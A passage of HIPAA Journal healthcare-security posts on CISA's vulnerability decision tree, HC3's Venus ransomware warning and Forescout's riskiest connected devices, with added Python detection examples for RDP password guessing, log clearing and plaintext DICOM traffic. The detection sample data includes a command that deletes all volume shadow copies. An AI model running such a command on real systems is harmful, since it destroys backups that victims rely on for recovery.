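The point of the structure is that a scanner's severity score never enters the decision directly: a KEV-listed bug on an essential system (VULN-A) goes straight to Act, while an equally "critical" bug with no known exploit (VULN-C) only earns Track*, which is the behaviour the article describes for a mature program.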

The SSVC and the guide on usage can be viewed here.

The post CISA Releases Decision Tree Methodology for Assessing and Remediating Software Vulnerabilities appeared first on HIPAA Journal.

HC3 Sounds Alarm About Venus Ransomware

The Health Sector Cybersecurity Coordination Center (HC3) has recently shared details of the tactics, techniques, and procedures associated with Venus ransomware attacks, and has made several recommendations on mitigations that healthcare organizations can implement to improve their defenses against attacks. Venus ransomware, aka GOODGAME, is a relatively new threat, having first been identified in mid-August 2022; however, the ransomware has been used globally in attacks and there are now submissions of the ransomware variant every day.

While the threat group is not known to specifically target the healthcare sector, there has been at least one attack on the healthcare industry in the United States. The primary method of initial access, as is the case with several ransomware groups, is exploiting publicly exposed Remote Desktop services, on both standard and non-standard TCP ports, to gain access to Windows devices and encrypt them.

Once access has been gained, the ransomware will attempt to terminate 39 processes associated with database servers and Microsoft Office applications. Event logs will be deleted along with Volume Shadow Copies, and Data Execution Prevention will be disabled on compromised endpoints. Files are encrypted using AES and RSA algorithms, and encrypted files are given the .venus extension, with a goodgamer filemarker and other information added to the file.

The threat actor claims to download data before encrypting files, although no data leak site has been associated with the group. This also does not appear to be a ransomware-as-a-service operation, although based on the number of attacks and IP addresses associated with the group, it appears to consist of several individuals.

Since publicly exposed Remote Desktop/RDP is attacked, healthcare organizations should ensure these services are protected by a firewall. Windows 11 users will be protected against brute force attacks to some degree, as login attempts are automatically limited. For other Windows versions, rate limiting should be implemented, as this will limit the number of attempts an attacker can make to connect to Remote Desktop services. Strong, unique passwords should be set for Remote Desktop services, multi-factor authentication (MFA) should be enforced, and RDP should be placed behind a Virtual Private Network (VPN).
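The behaviours described above (password guessing against exposed Remote Desktop, deletion of shadow copies, and clearing of event logs) each leave a trace in the Windows Security log. The following added example, which is not from HC3's analyst note or from HIPAA Journal, runs three detections over constructed sample records: repeated failed logons (Event ID 4625) from one source address, process creations (Event ID 4688) whose command line deletes shadow copies, and the audit-log-cleared event (Event ID 1102). The record layout, the thresholds and the sample events are assumptions made for the example.

```python
"""Detection logic for the Venus ransomware behaviours described above, run
over constructed Windows Security log records (added example, not HC3's)."""
from collections import defaultdict
from datetime import datetime, timedelta


def _failed_logon(ts, ip, user):
    return {"event_id": 4625, "time": ts, "ip": ip, "user": user}


# Constructed sample telemetry (documentation IP ranges, not real logs).
SAMPLE_EVENTS = (
    # 12 failed logons from one address inside one minute: password guessing
    [_failed_logon(f"2022-11-14T02:00:{i * 5:02d}", "198.51.100.7", "administrator")
     for i in range(12)]
    # two failures from another address: below threshold, probably a typo
    + [_failed_logon("2022-11-14T03:00:00", "203.0.113.5", "jsmith"),
       _failed_logon("2022-11-14T03:00:30", "203.0.113.5", "jsmith")]
    + [
        {"event_id": 4688, "time": "2022-11-14T02:09:00",
         "command_line": "C:\\Windows\\system32\\notepad.exe"},
        {"event_id": 4688, "time": "2022-11-14T02:10:00",
         "command_line": "vssadmin.exe delete shadows /all /quiet"},
        {"event_id": 1102, "time": "2022-11-14T02:11:00", "user": "administrator"},
    ]
)


def detect_rdp_password_guessing(events, threshold=10, window=timedelta(minutes=5)):
    """Source IPs with at least `threshold` failed logons (4625) inside any
    `window`. With Network Level Authentication enabled, failed RDP logons
    commonly appear as logon type 3, so the check keys on the source address
    rather than on the logon type."""
    by_ip = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625 and e.get("ip"):
            by_ip[e["ip"]].append(datetime.fromisoformat(e["time"]))
    hits = {}
    for ip, times in by_ip.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[ip] = peak
    return hits


def detect_shadow_copy_deletion(events):
    """Process creations (4688) whose command line deletes volume shadow copies."""
    found = []
    for e in events:
        if e["event_id"] != 4688:
            continue
        cmd = e["command_line"].lower()
        if "shadow" in cmd and "delete" in cmd:
            found.append(e["command_line"])
    return found


def detect_audit_log_cleared(events):
    """Event 1102 is written when the Security log itself is cleared."""
    return [e for e in events if e["event_id"] == 1102]


def run_detections(events):
    """Summarise all three detections for a batch of events."""
    return {
        "rdp_password_guessing": detect_rdp_password_guessing(events),
        "shadow_copy_deletion": detect_shadow_copy_deletion(events),
        "audit_log_cleared": len(detect_audit_log_cleared(events)),
    }


if __name__ == "__main__":
    print(run_detections(SAMPLE_EVENTS))
```

The three detections are deliberately independent: the guessing check works even when the endpoint is later wiped, because the failed-logon events can be forwarded to a collector before the attacker clears the local log, which is exactly why a 1102 event on a host with no scheduled log rotation deserves a look on its own.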

The damage caused by a successful attack can be greatly limited by implementing network segmentation, and best practices should be followed for data backups. The 3-2-1 approach is recommended: create one primary backup and two copies, store the backups on at least 2 different media, and keep one copy securely offsite. Backups should ideally be encrypted, and certainly password-protected, and should not be accessible from the system where the data resides.

While these attacks target Remote Desktop services, security measures should be implemented to protect against other attack vectors such as email and the exploitation of software vulnerabilities. Ensure an email security solution is in place, consider adding a banner to emails from external sources, disable hyperlinks in emails, provide regular security awareness training to the workforce, ensure patches are applied promptly, make sure the latest version of software is installed, and ensure that administrator access is required to install software. Antivirus software should also be installed on all endpoints.

Further information can be found in the HC3 Venus Ransomware Analyst Note.

The post HC3 Sounds Alarm About Venus Ransomware appeared first on HIPAA Journal.

The Riskiest Connected Devices in Healthcare

The number of connected devices being used in hospitals continues to grow, and while these devices can improve efficiency, safety, and patient outcomes, they have also substantially increased the attack surface. Many of these devices either lack appropriate security features or are not correctly configured.

According to a recent Microsoft-sponsored study by the Ponemon Institute into the current state of IoT/OT cybersecurity, 65% of organizations said their IoT/OT devices were one of the least secured parts of their networks, with 50% reporting an increase in attacks on IoT/OT devices. 88% of respondents said they have IoT devices that are accessible over the Internet, and 51% have OT devices accessible over the Internet. Cybercriminals are increasingly attacking these devices as they are a weak point that can be easily exploited. These devices are the target of malware, ransomware, and are among the main initial access points for malicious actors.

In 2020, Forescout analyzed the types of devices used in enterprise networks to determine which pose the highest risk, and this month published an updated version of the report. Most of the devices that were rated high risk remain on the updated list, including networking equipment, VoIP, IP cameras, and programmable logic controllers (PLCs), with hypervisors and human-machine interfaces (HMIs) added this year.

The majority of the riskiest devices are on the list because they are frequently exposed on the Internet or because they are critical to business operations, and vulnerabilities are present in all of them. Almost all organizations rely on a combination of IT, IoT, and OT, with healthcare also relying on IoMT devices. That means almost all organizations face a growing attack surface, as they have at least one type of risky device connected to their network.

The riskiest devices in each category are detailed in the table below:

[Table not reproduced] The Riskiest Connected Devices. Source: Forescout

Many of the devices included in the list are difficult to patch and manage, which means vulnerabilities are not addressed quickly. IoMT devices are risky because they can provide access to internal networks and can contain valuable patient information, and attacks on these devices can have an impact on healthcare delivery and patient safety. Attacks have been conducted on hospitals that have resulted in fetal monitors being disabled, and in 2020, several attacks were conducted on radiation information systems.

DICOM workstations, nuclear medicine systems, imaging devices, and PACS are all used for medical imaging, and as such can contain highly sensitive patient data. They also commonly run legacy IT operating systems and have extensive network capability for easy sharing of medical imaging data, most commonly using the DICOM standard for sharing files. DICOM was not developed with security in mind, and while DICOM does permit the encryption of data in transit, it is up to individual healthcare organizations to configure encryption. Encryption is not activated in many hospitals, which means medical images are transmitted in clear text and can easily be intercepted and tampered with to include malware. Patient monitors are also amongst the most vulnerable IoMT devices as they commonly communicate using unencrypted protocols, which means communications could be easily intercepted and tampered with. Tampering could prevent alerts from being received.
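Whether DICOM traffic is actually encrypted is something a hospital can verify from its own network captures rather than assume. The following added example (not from the Forescout report or HIPAA Journal) looks at the first bytes of each connection to a DICOM listener and distinguishes a plaintext A-ASSOCIATE-RQ PDU, whose fixed header carries the called and calling Application Entity titles in clear, from a TLS handshake. The port list, the flow record layout and the sample payloads are assumptions constructed for the example.

```python
"""Check whether connections to DICOM listeners open with a plaintext DICOM
association or a TLS handshake. Added example using constructed payloads."""
import struct

DICOM_PORTS = {104, 11112, 2762}  # assumption: ports the site's PACS listens on
TLS_HANDSHAKE_TYPE = 0x16          # TLS record content type for handshake


def build_associate_rq(called_ae, calling_ae):
    """Build the 74-byte fixed header of an A-ASSOCIATE-RQ PDU: PDU type 0x01,
    reserved byte, 4-byte length, protocol version 1, two reserved bytes,
    16-byte called and calling AE titles, 32 reserved bytes. Constructed
    for the example; variable items that follow in a real PDU are omitted."""
    body = struct.pack(">H2x", 0x0001)
    body += called_ae.ljust(16).encode("ascii")
    body += calling_ae.ljust(16).encode("ascii")
    body += b"\x00" * 32
    return struct.pack(">BxI", 0x01, len(body)) + body


def classify_payload(payload):
    """Say what the opening bytes of a flow look like."""
    if len(payload) >= 3 and payload[0] == TLS_HANDSHAKE_TYPE and payload[1] == 0x03:
        return {"kind": "tls"}
    if len(payload) >= 74 and payload[0] == 0x01 and payload[1] == 0x00:
        version = struct.unpack(">H", payload[6:8])[0]
        if version & 0x0001:  # bit 0 set = DICOM protocol version 1
            return {
                "kind": "dicom_plaintext",
                "called_ae": payload[10:26].decode("ascii", "replace").strip(),
                "calling_ae": payload[26:42].decode("ascii", "replace").strip(),
            }
    return {"kind": "unknown"}


def audit_flows(flows):
    """Flag every flow to a DICOM port whose association is sent in clear."""
    findings = []
    for f in flows:
        if f["dport"] not in DICOM_PORTS:
            continue
        result = classify_payload(f["payload"])
        if result["kind"] == "dicom_plaintext":
            findings.append({
                "src": f["src"], "dst": f["dst"], "dport": f["dport"],
                "called_ae": result["called_ae"],
                "calling_ae": result["calling_ae"],
            })
    return findings


# Constructed flows: a plaintext association from a CT modality to the PACS,
# a TLS ClientHello prefix, and an unrelated HTTP request on the DICOM port.
SAMPLE_FLOWS = [
    {"src": "10.20.0.15", "dst": "10.20.0.2", "dport": 104,
     "payload": build_associate_rq("PACS1", "CT_SCANNER_01")},
    {"src": "10.20.0.16", "dst": "10.20.0.2", "dport": 2762,
     "payload": b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"},
    {"src": "10.20.0.17", "dst": "10.20.0.2", "dport": 104,
     "payload": b"GET / HTTP/1.1\r\n"},
]

if __name__ == "__main__":
    for finding in audit_flows(SAMPLE_FLOWS):
        print(finding)
```

Because the AE titles are recovered from the plaintext header, the same pass doubles as an inventory of which modalities talk to which archive, which is the input a risk assessment of the imaging network needs anyway.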

The key to managing risk is to understand how the attack surface is growing and to conduct a comprehensive risk assessment to understand where the vulnerabilities exist. Those risks can then be subjected to a risk management process and can be reduced to a low and acceptable level. “Once you understand your attack surface, you need to mitigate risk with automated controls that do not rely only on security agents and that apply to the whole enterprise instead of silos like the IT network, the OT network or specific types of IoT devices,” suggests Forescout.

The post The Riskiest Connected Devices in Healthcare appeared first on HIPAA Journal.